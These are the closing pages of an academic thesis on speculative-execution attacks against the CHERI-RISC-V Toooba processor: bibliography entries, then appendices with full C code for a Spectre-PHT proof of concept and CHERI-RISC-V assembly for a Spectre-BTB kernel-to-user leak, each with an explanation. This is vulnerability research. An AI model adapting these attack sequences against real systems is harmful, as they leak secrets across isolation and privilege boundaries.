[33] Intel Corporation. Intel Analysis of Speculative Execution Side Channels. Tech. rep. 4.0. 2018, p. 16. url: https://www.intel.com/content/www/us/en/architecture-and-technology/intel-analysis-of-speculative-execution-side-channels-paper.html.
[34] Vladimir Kiriansky and Carl Waldspurger. Speculative Buffer Overflows: Attacks and Defenses. 2018. arXiv: 1807.03757 [cs.CR].
[35] Dag Arne Osvik, Adi Shamir, and Eran Tromer. “Cache Attacks and Countermeasures: The Case of AES”. In: Proceedings of the 2006 The Cryptographers’ Track at the RSA Conference on Topics in Cryptology. CT-RSA’06. San Jose, CA: Springer-Verlag, 2006, pp. 1–20.
[36] Arm Limited. Arm v8.5-A CPU updates. https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability. Version 1.4. June 2019.

[37] Robert N. M. Watson et al. Capability Hardware Enhanced RISC Instructions: CHERI Instruction-Set Architecture (Version 8). Tech. rep. UCAM-CL-TR-951. University of Cambridge, Computer Laboratory, Oct. 2020. url: https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-951.pdf.
[38] Jonathan Woodruff et al. “CHERI Concentrate: Practical Compressed Capabilities”. In: IEEE Transactions on Computers 68.10 (2019), pp. 1455–1469.
[39] Brooks Davis et al. CheriABI: Enforcing valid pointer provenance and minimizing pointer privilege in the POSIX C run-time environment. Tech. rep. UCAM-CL-TR-932. University of Cambridge, Computer Laboratory, Apr. 2019. url: https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-932.pdf.
[40] Hongyan Xia et al. “CheriRTOS: A Capability Model for Embedded Devices”. In: 2018 IEEE 36th International Conference on Computer Design (ICCD). Orlando, FL, USA: IEEE Computer Society, Oct. 2018, pp. 92–99.
[41] David Kaplan, Jeremy Powell, and Tom Woller. AMD SEV-SNP: Strengthening VM Isolation with Integrity Protection and More. Tech. rep. Advanced Micro Devices Inc., Jan. 2020. url: https://www.amd.com/system/files/TechDocs/SEV-SNP-strengthening-vm-isolation-with-integrity-protection-and-more.pdf.
[42] Abraham Gonzalez et al. “Replicating and Mitigating Spectre Attacks on a Open Source RISC-V Microarchitecture”. In: Third Workshop on Computer Architecture Research with RISC-V. Phoenix, AZ, USA, June 2019.
[43] Christopher Celio, David A. Patterson, and Krste Asanović. The Berkeley Out-of-Order Machine (BOOM): An Industry-Competitive, Synthesizable, Parameterized RISC-V Processor. Tech. rep. UCB/EECS-2015-167. University of California at Berkeley, Electrical Engineering and Computer Sciences, June 2015.
[44] Anh-Tien Le et al. “Experiment on Replication of Side Channel Attack via Cache of RISC-V Berkeley Out-of-Order Machine (BOOM) Implemented on FPGA”. In: Fourth Workshop on Computer Architecture Research with RISC-V (CARRV 2020). Valencia, Spain, May 2020.

[45] Arm Limited. Vulnerability of Speculative Processors to Cache Timing Side-Channel Mechanism. https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability. 2020.
[46] Sizhuo Zhang et al. “Composable Building Blocks to Open up Processor Design”. In: 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). Fukuoka, Japan, Oct. 2018, pp. 68–81.
[47] Zhen Hang Jiang and Yunsi Fei. “A novel cache bank timing attack”. In: 2017 IEEE/ACM International Conference on Computer-Aided Design (ICCAD). Irvine, CA, USA, Nov. 2017, pp. 139–146.
[48] Hovav Shacham. “The Geometry of Innocent Flesh on the Bone: Return-into-Libc without Function Calls (on the x86)”. In: Proceedings of the 14th ACM Conference on Computer and Communications Security. CCS ’07. Alexandria, Virginia, USA: Association for Computing Machinery, 2007, pp. 552–561.
[49] Arm Limited. Arm Architecture Reference Manual Supplement Morello for A-profile Architecture. DDI0606. Arm Limited. Sept. 2020.

Appendix A

Full C Attack

/*
 * Author: Franz Fuchs
 *
 * Spectre-PHT proof of concept version
 *
 * spec_funct first checks the array bounds
 * and then loads the value determined by the
 * index. By training the Pattern History Table
 * with 16 calls to the function with valid indexes,
 * we trick Toooba into speculatively executing
 * the loads even though the index is out of bounds.
 */

#ifdef __CHERI_PURE_CAPABILITY__
#include "pure_cap.h"
#endif

#define MEM_SIZE 16384
#define MEM_SIZE_DW MEM_SIZE/8
#define STACK_SIZE 2048
#define STACK_SIZE_DW STACK_SIZE/8
#define PROBE_SIZE 2048
#define PROBE_SIZE_DW PROBE_SIZE/8
#define SEC_ARR_SIZE 128
#define SEC_ARR_SIZE_DW SEC_ARR_SIZE/8
#define FLUSH_ARR_SIZE 16384


#define FLUSH_ARR_SIZE_DW FLUSH_ARR_SIZE/8

long int mem[MEM_SIZE_DW];
long int buffer[FLUSH_ARR_SIZE_DW];
long int stack[STACK_SIZE_DW];
long int flush_arr[FLUSH_ARR_SIZE_DW];

// array with secrets that may not
// be overflowed
long int* sec_arr_1[SEC_ARR_SIZE_DW];
long int* sec_arr_2[SEC_ARR_SIZE_DW];

long int size = 16;

int main();
void fill_sec_arr();
void probe();
long int spec_funct(long int index);
void flush();
extern void _init_sp(void);

int main() {
    // write to stack in order to
    // not out-optimize this
    stack[0] = 0;

    size = 16;
    fill_sec_arr();

    // train the pattern history table of the
    // speculative function
    flush_arr[0x0] = spec_funct(0x0);
    flush_arr[0x1] = spec_funct(0x1);
    flush_arr[0x2] = spec_funct(0x2);
    flush_arr[0x3] = spec_funct(0x3);
    flush_arr[0x4] = spec_funct(0x4);
    flush_arr[0x5] = spec_funct(0x5);
    flush_arr[0x6] = spec_funct(0x6);
    flush_arr[0x7] = spec_funct(0x7);
    flush_arr[0x8] = spec_funct(0x8);
    flush_arr[0x9] = spec_funct(0x9);
    flush_arr[0xa] = spec_funct(0xa);
    flush_arr[0xb] = spec_funct(0xb);
    flush_arr[0xc] = spec_funct(0xc);
    flush_arr[0xd] = spec_funct(0xd);
    flush_arr[0xe] = spec_funct(0xe);
    flush_arr[0xf] = spec_funct(0xf);

    // flush cache to evict the line
    // containing the `size` parameter
    flush();

    // store index at mem
    // keep line cached
    sec_arr_2[8] = & (mem[0x40]);

    // ensure that all previous
    // loads and stores are finished
    asm volatile("fence rw, rw");

    // call spec function with
    // out of bounds argument
    flush_arr[0x20] = spec_funct(24);

    // probe the memory
    probe();
}

void fill_sec_arr() {
    for(int i = 0; i < size; i++) {
        sec_arr_1[i] = &(mem[0]);
    }
}

void probe() {
    long int dest;
    for(int i = 0; i < FLUSH_ARR_SIZE_DW; i = i + 8) {
        dest = mem[i];
        mem[i] = dest + 1;
    }
}

long int spec_funct(long int index) {
    long int dest = index;

    if(index < size) {
        long int* mem_index = sec_arr_1[index];
        dest = *mem_index;
    }
    return dest;
}

void flush() {
    long int dest;
    for(int i = 0; i < FLUSH_ARR_SIZE_DW; i = i + 8) {
        dest = flush_arr[i];
        flush_arr[i] = dest + 1;
    }
}

In this appendix, I explain how I conducted a Spectre-PHT attack written in C. However, I do not explain the specific Spectre-PHT vulnerability as I have already done so in Chapters 4 and 5. I chose a similar setup to the original Spectre-PHT attack demonstrated in [22]. Parts of the preparation code, e.g., initialising registers, are not shown in the code above. The attack setup is as follows. The function spec_funct accesses the array sec_arr_1 and returns the value stored at the secret memory pointer if the parameter index is less than size. I chose size to be 16 in this example. There exists another array, sec_arr_2, which holds secret memory pointers as well. It is the attacker's goal to reveal one or more secret memory addresses from sec_arr_2 in this attack. The arrays sec_arr_1 and sec_arr_2 are placed adjacently in memory by the compiler. The attacker wants to use a greater index than allowed in order to read from sec_arr_2 instead of sec_arr_1. The code in main fulfils three functions: it prepares the attack, conducts it, and eventually reveals the sought memory address by probing. In the preparation phase, I fill the array sec_arr_1 with meaningful pointer values and call the function spec_funct with values in the range [0, ..., 0xf] for the index parameter. Next, I need to flush the memory in order to evict the cache line that holds the value of the size variable. The flush function evicts cache lines by loading other cache lines that are currently not present. Flushing introduces the necessary delay for the actual Spectre-PHT attack later. After flushing, I also set up the array sec_arr_2 for the attack by storing a meaningful value. This also brings the corresponding cache lines into the cache, which makes the attack faster. The last step before the attack is to introduce a memory fence, which prevents the processor from speculating too far ahead. Speculating too far would cause uninitialised data to be used in speculation, which would lead to cache misses and therefore would negatively impact the entire attack. In general, the attacker wants to use every cycle of the misspeculated control flow as effectively as possible and therefore wants to avoid unnecessary cache misses. After that, the actual attack is conducted as described in Chapters 4 and 5. Last, I use the probing mechanism described in Section 3.3.2, which reveals the sought value.

Appendix B

Full CHERI-RISC-V Attack

.text

/* Kernel-BTB
   Author: Franz Fuchs

   The goal of the attack is to speculatively jump from S mode
   to U mode. This gives an attacker the full register state of
   the code operating in S mode. In this example, the user code
   leaks data private to M mode. This attack is similar to the
   sandbox attack.

   1st load: 0x0000000080060000
   2nd load: 0x0000000080061000
*/

change_to_cap_mode:
    // set pcc flags such that capability encoding
    // mode is used
    // This is described in the CHERI Specification v7
    cspecialr ct3, pcc
    li t1, 1
    csetflags ct3, ct3, t1
    li t2, 0x80000018
    csetoffset ct3, ct3, t2


    cjr ct3

init_caps:

    /*
     * data capabilities
     */

    // cs1 is a capability to [0x80001000 - 0x80001fff]
    li t2, 0x80001000
    cfromptr cs1, ddc, t2
    li t1, 0x1000
    csetbounds cs1, cs1, t1

    // ct6 is a capability to [0x80002000 - 0x80002fff]
    li t2, 0x80002000
    cfromptr ct6, ddc, t2
    li t1, 0x1000
    csetbounds ct6, ct6, t1
    // store value at 0(ct6)
    li t1, 0x200
    csd t1, 0(ct6)

    /*
     * code capabilities
     */

    // PCC for flush function
    cllc cs4, flush
    li t1, 0x100
    csetbounds cs4, cs4, t1

    // PCC for user code jump
    cllc cs5, user_funct_cont
    li t1, 0x100
    csetbounds cs5, cs5, t1

    // PCC for kernel code jump
    cllc ct1, kernel_funct_cont
    li t2, 0x100
    csetbounds ct1, ct1, t2
    // store at 0(cs1)
    csc ct1, 0(cs1)

init_exceps:

    // enable interrupts for all privilege levels
    // MIE = 1, SIE = 1, UIE = 1
    li t2, 0xb
    csrs mstatus, t2

    // delegate ecalls to S mode
    // ecalls are set with bit 8
    li t2, 256
    csrw medeleg, t2

// changes to S mode
change_to_s_mode:

    // set MPP such that we return to S mode
    li x6, 0x00001000
    csrc mstatus, x6
    li x6, 0x00000800
    csrs mstatus, x6

    // store perform_s_mode_action address in mepcc
    cllc ct0, perform_s_mode_action
    cspecialw mepcc, ct0

mret

// initialises trap vector
perform_s_mode_action:

    // stvec mode: direct (value 0 as RISC-V instructions
    // are aligned on 2 byte boundaries)
    // stvec base address: kernel_funct
    cllc ct2, kernel_funct
    li t1, 0x10000
    csetbounds ct2, ct2, t1
    cspecialw stcc, ct2

change_to_u_mode:

    // set SPP such that we return to U mode
    li x6, 0x00000100
    csrc sstatus, x6

    // store user_funct address in sepcc
    cllc ct0, user_funct
    li t1, 0x10000
    csetbounds ct0, ct0, t1
    cspecialw sepcc, ct0

    // jump to user code
    sret

flush:
    // flush entire cache

    // use ddc for that
    // set to memory address not used by
    // other sections
    li t2, 0x80010000
    li t3, 0x4000
    add t3, t2, t3
    cfromptr ct1, ddc, t2
flush_loop:
    cld t0, 0(ct1)
    cincoffsetimm ct1, ct1, 64
    cgetaddr t0, ct1
    ble t0, t3, flush_loop

    // fence instruction
    fence rw, rw
    cret

/*
 * kernel code
 *
 * running in S privilege mode
 */

.section .kernel , "ax"
kernel_funct:
    // jump to start function
    // done this way in order to always have the same
    // start address, which makes it easier to
    // alias the right BTB entry
    j kernel_funct_start

.rept 0x40
.byte 0x00
.endr

kernel_funct_start:
    // generate a powerful capability
    li t2, 0x80060000
    li t3, 0x10000
    li t4, 0x1000
    add t3, t2, t3
    cfromptr ct6, ddc, t2
    csd t4, 0(ct6)

    // jump to kernel_funct_cont
    clc ct1, 0(cs1)
    // this jump will be aliased and MUST NOT be
    // moved around. If moved around, the corresponding
    // jump in the user code must be adjusted as well
    cjr ct1

.rept 0x40
.byte 0x00
.endr

kernel_funct_cont:
    // content of ct6 shall not be visible to anyone else
    cmove ct6, cnull
    // idle here
    j kernel_funct_cont

/*
 * user code
 *
 * running in U privilege mode
 */

.section .user , "ax"
user_funct:
    // done this way in order to always have the same
    // start address, which makes it easier to
    // alias the right BTB entry
    j user_funct_start

.rept 0xc52
.byte 0x00
.endr

user_funct_start:
    // flush caches
    cjalr cra, cs4
    // jump to continued code
    // this jump will be used for aliasing and MUST NOT be
    // moved around. If moved around, the corresponding
    // jump in the kernel code must be adjusted as well
    cjr cs5

.rept 0x40
.byte 0x00
.endr

user_funct_cont:
    // load from ct6

    // This is the transient-execution sequence
    // revealing the secret value
    cld t5, 0(ct6)
    cincoffset ct5, ct6, t5
    cld t5, 0(ct5)
    // call kernel_funct
    ecall
    // infinite loop
user_funct_loop:
    add t1, x0, x0
    beq t1, x0, user_funct_loop

In this appendix, I explain how I conducted a Spectre-BTB attack written in CHERI-RISC-V assembly. However, I do not explain the specific Spectre-BTB vulnerability as I have already done so in Chapters 4 and 5. The code is separated into preparation code, kernel code, and user code. The goal of the attack is to leak a kernel-space secret from user space. I only describe the preparation code, as the kernel and user-space code depicted above show large similarities to the attack described in Section 5.1.3. The first task is to bring Toooba from integer pointer mode to capability pointer mode, which is achieved in change_to_cap_mode by setting the corresponding flag on a code capability and then jumping to it. The next step is to set up capability registers with the code and data capabilities used during the demonstration of the attack later. This is done in the code following the init_caps label. The principle is always the same: first, the almighty capability stored in ddc is moved to a register and the base address of the capability is specified; as the second and last step, the bounds are set. The largest part of the preparation code sets up Toooba such that the kernel code runs in S privilege mode and the user code runs in U privilege mode. The kernel code will be called during exception handling, which requires me to enable exceptions (done in init_exceps) and to set up exception vectors. A pointer to the function kernel_funct is stored in

stcc – the capability-extended register for the exception vector base address register in S privilege mode – setting up exception handling. Finally, the code changes the privilege mode to U mode and jumps to the function user_funct – the beginning of the user code. The two instructions in the function user_funct_start constitute the last part of the preparation code. The first instruction is a call to the flush function defined earlier in the code. This ensures that a load in the kernel code will miss all caches and therefore enables the attack, because Toooba misspeculates for a longer time. The second instruction is a jump to the label user_funct_cont. This jump instruction trains the BTB as described in Chapter 5. The ecall instruction is an environment call, which is handled by the kernel code. This effectively starts the attack. A probing function is not shown in the attack example above. At multiple places in the code, I use assembler macros that insert zero bytes as no-operations (nops). This is used in order to align instructions in memory such that the BTB aliasing approach works. The .section statements have the same task, but on a coarser scale.
